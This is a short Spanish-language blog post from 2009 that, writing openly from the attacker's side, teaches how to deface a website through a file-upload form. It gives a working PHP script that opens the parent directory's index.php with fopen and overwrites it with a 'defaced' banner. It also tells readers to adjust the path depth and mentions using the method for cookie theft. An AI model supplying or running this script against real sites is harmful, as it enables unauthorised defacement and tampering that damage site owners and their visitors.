Backup Oficial de SeguridadBlanca.Org

martes, 13 de octubre de 2009

Escribiendo Archivos con Fopen

Esto lo escribo ya que es muy util para el momento en el que ingresamos a páginas con upload de archivos... como dice el titulo vamos a escribir archivos con php de tal manera que podamos cambiar algo, puede ser el index en el caso de que alguien malo lo quiera hacer, como este es un blog en el que nos ponemos del lado del mal pues lo haremos para cambiar el index... a ver digamos que estamos en un upload de archivos la pagina tiene un filemanager o un upload de archivos que tiene filtrado para no poner un nuevo index... pensando que el admin es bueno en seguridad, vamos a abrir un blog de notas e ingresaremos las siguientes lineas de code...


<?php

$fp = fopen("../index.php", "w");

$tuindex = "\n<center> <h1>defaced</h1></center>";

$write = fputs($fp, $tuindex);

fclose($fp);

?>



listo ahora solo faltaría ir a la ruta del archivo y actualizar el index.php de todos modos pues este tema no solo se puede usar para cambiar index sino para robo de cookies o quizas para saber quienes entran a tu web y mantener un control... o estadisticas...

ojo ustedes tienen que cambiar el ../ por la cantidad de directorios que necesiten... espero les sirva este tuto...


Saludos
Dr.White

No hay comentarios:

Publicar un comentario